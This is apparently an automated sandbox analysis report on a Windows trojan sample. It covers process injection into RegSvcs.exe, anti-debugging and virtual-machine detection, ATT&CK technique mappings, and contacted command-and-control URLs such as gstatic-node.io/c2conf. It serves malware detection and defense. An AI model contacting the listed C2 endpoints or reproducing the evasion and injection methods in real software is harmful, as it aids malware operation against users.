Source:	Binary string: mscorlib.pdb source: FT0uDS8neB.exe, 00000000.00000002.260438122.0000000072263000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: System.ni.pdbRSDS source: FT0uDS8neB.exe, 00000000.00000002.253372497.0000000070F8F000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: ucrtbase_clr0400.i386.pdb source: FT0uDS8neB.exe, 00000000.00000002.270050086.0000000072951000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: mscorlib.ni.pdb source: FT0uDS8neB.exe, 00000000.00000002.260438122.0000000072263000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS.TH source: FT0uDS8neB.exe, 00000000.00000002.260438122.0000000072263000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: System.Core.pdb source: FT0uDS8neB.exe, 00000000.00000002.250010489.0000000070581000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: vcruntime140_clr0400.i386.pdb source: FT0uDS8neB.exe, 00000000.00000002.270531529.00000000739A1000.00000020.00000001.01000000.00000004.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS"f4v9 source: FT0uDS8neB.exe, 00000000.00000002.250010489.0000000070581000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: ucrtbase_clr0400.i386.pdbGCTL source: FT0uDS8neB.exe, 00000000.00000002.270050086.0000000072951000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: System.ni.pdb source: FT0uDS8neB.exe, 00000000.00000002.253372497.0000000070F8F000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: System.pdb source: FT0uDS8neB.exe, 00000000.00000002.253372497.0000000070F8F000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: System.Core.ni.pdb source: FT0uDS8neB.exe, 00000000.00000002.250010489.0000000070581000.00000020.00000001.01000000.00000008.sdmp

Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_05A31799 push ebx; iretd	0_2_05A3179A
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_05B75775 push B8FFFFC3h; ret	0_2_05B7577C
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Code function: 0_2_05B74B7D push eax; iretd	0_2_05B74B84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0045893D push esi; ret	1_2_00458946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004019C7 push eax; mov dword ptr [esp], 00000000h	1_2_004019CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00449C28 push ecx; ret	1_2_00449C3B

Source: FT0uDS8neB.exe

Static PE information: 0xBB772F44 [Sat Aug 31 04:51:16 2069 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 6.967152206152922

Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\FT0uDS8neB.exe TID: 6660

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API coverage: 4.7 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetAdaptersInfo,GetAdaptersInfo,

1_2_0041DAD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004493C8 FindFirstFileExW,		1_2_004493C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0044947C FindFirstFileExW,FindNextFileW,FindClose,FindClose,		1_2_0044947C

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node			graph_1-30916
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node			graph_1-30925

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.3.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegSvcs.exe, 00000001.00000002.253094942.0000000001236000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.me
Source: RegSvcs.exe, 00000001.00000002.253094942.0000000001236000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegSvcs.exe, 00000001.00000002.253094942.00000000011F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(a$
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_00431855 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00431855

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_00427ACE GetProcessHeap,CreateCompatibleDC,CreateCompatibleBitmap,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,DeleteObject,

1_2_00427ACE

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004303CD mov eax, dword ptr fs:[00000030h]	1_2_004303CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0043B51A mov ecx, dword ptr fs:[00000030h]	1_2_0043B51A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00446FD5 mov eax, dword ptr fs:[00000030h]	1_2_00446FD5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

1_2_0042D2D9

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00431849 SetUnhandledExceptionFilter,	1_2_00431849
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00431855 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00431855
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00431D60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00431D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004457FB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004457FB

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 455000	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 460000	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 462000	Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D2C008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jump to behavior

Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Queries volume information: C:\Users\user\Desktop\FT0uDS8neB.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\FT0uDS8neB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_00431A78 cpuid

1_2_00431A78

Source: C:\Users\user\Desktop\FT0uDS8neB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_0043DCD1 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

1_2_0043DCD1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_0044B042 GetTimeZoneInformation,

1_2_0044B042

Source: Amcache.hve.3.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 Input Capture	2 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	41 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	311 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	4 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Software Packing	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 DLL Side-Loading	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FT0uDS8neB.exe	29%	ReversingLabs	Win32.Trojan.Generic
FT0uDS8neB.exe	42%	Virustotal		Browse
FT0uDS8neB.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
gstatic-node.io	24%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://gstatic-node.io/c2confLh	100%	Avira URL Cloud	malware
http://gstatic-node.io/	100%	Avira URL Cloud	malware
http://gstatic-node.io/f	100%	Avira URL Cloud	malware
http://gstatic-node.io/c2conf	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gstatic-node.io	188.114.96.7	true	false	24%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gstatic-node.io/	false	Avira URL Cloud: malware	unknown
http://gstatic-node.io/c2conf	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://gstatic-node.io/c2confLh	RegSvcs.exe, 00000001.00000002.253094942.000000000121B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://gstatic-node.io/f	RegSvcs.exe, 00000001.00000002.253094942.0000000001260000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://upx.sf.net	Amcache.hve.3.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	FT0uDS8neB.exe, 00000000.00000002.260438122.00000000714B0000.00000020.00000001.01000000.00000006.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	RegSvcs.exe, 00000001.00000002.253094942.000000000126E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.7	unknown	European Union		13335	CLOUDFLARENETUS	true
188.114.96.7	gstatic-node.io	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1293164
Start date and time:	2023-08-18 00:11:33 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	FT0uDS8neB.exe
Original Sample Name:	e6b8cfb15c6fce9abcea7a716345d537.exe
Detection:	MAL
Classification:	mal96.evad.winEXE@4/7@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 83.3% (good quality ratio 77.4%) Quality average: 78.6% Quality standard deviation: 29.7%
HCA Information:	Successful, ratio: 84% Number of executed functions: 57 Number of non-executed functions: 55
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 52.184.217.56, 2.20.210.223
Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, kv601.prod.do.dsp.mp.microsoft.com.edgekey.net, fs.microsoft.com, geo.prod.do.dsp.trafficmanager.net, geo.prod.do.dsp.mp.microsoft.com, e12358.d.akamaiedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, watson.telemetry.microsoft.com, array509.prod.do.dsp.mp.microsoft.com, arc.msn.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:12:32	API Interceptor	1x Sleep call for process: FT0uDS8neB.exe modified
00:12:35	API Interceptor	1x Sleep call for process: RegSvcs.exe modified
00:12:37	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.7	DHL_AWB_45000289001.exe	Get hash	malicious	FormBook	Browse	www.czjhsklu.click/nnsx/?5zJ7A=Qq1QKV4-cye&19k=RL//gf/vScFATBns9FIQi5KKfwQZT34QZmfKaSAAxjU4wqB/ZGbqe/rMD1h4is7rBcvtUcJo7iNEgRFSJ+Q5lI7d12vMO4CBxqvZnOXr3nPV
	hesaphareketi-01.pdf.exe	Get hash	malicious	FormBook	Browse	www.hlteuo.com/coan/?9iFY=3rvoHpqfxFbJ4Dcm0ZW57fWL6gggnDrIjuE7x9jEjxad9wQC27zoaOZJXu7cud9ZmDdzXpLuQtu+MyqCjjAHlY7uy4d/YHBSpA==&Pu2TM=jVDHj
	sm46NqECwv.exe	Get hash	malicious	FormBook	Browse	www.gtma10.vip/c3bm/?4nxlTg2=krCldiLgjcApKXxrGjhuaKpz6ZHvYhZGq0ZIJRxCzMFoz9nWr9LtpAXVljRcNxh/nVbbku+Fmqa2xbVL9lcLNTxpm3PzxzrMAA==&IM842=K-RervNWusjtX
	udEvgI8oAR.exe	Get hash	malicious	FormBook	Browse	www.jpxiaoxi.top/oy30/?UvLp=LRt97ZM8TCfgatn4gwFyTzgl4AcXQEIUEiEc1jDvK7Yz8GVtzAA4YmUAS/AouR6FOgtc&o0G=AJEx_TCPEV
	jHoKVFIV53.exe	Get hash	malicious	FormBook	Browse	www.gtma10.vip/c3bm/?dGgHTAY=krCldiLgjcApKXxkJhxRa5BznJXscTBGq0ZIJRxCzMFoz9nWr9LtpAXVljRcNxh/nVbbku+Fmqa2xbVL9lcKNRh52DaT/EjyAA==&-HrvQ=N8LIJy_b81rqFVN
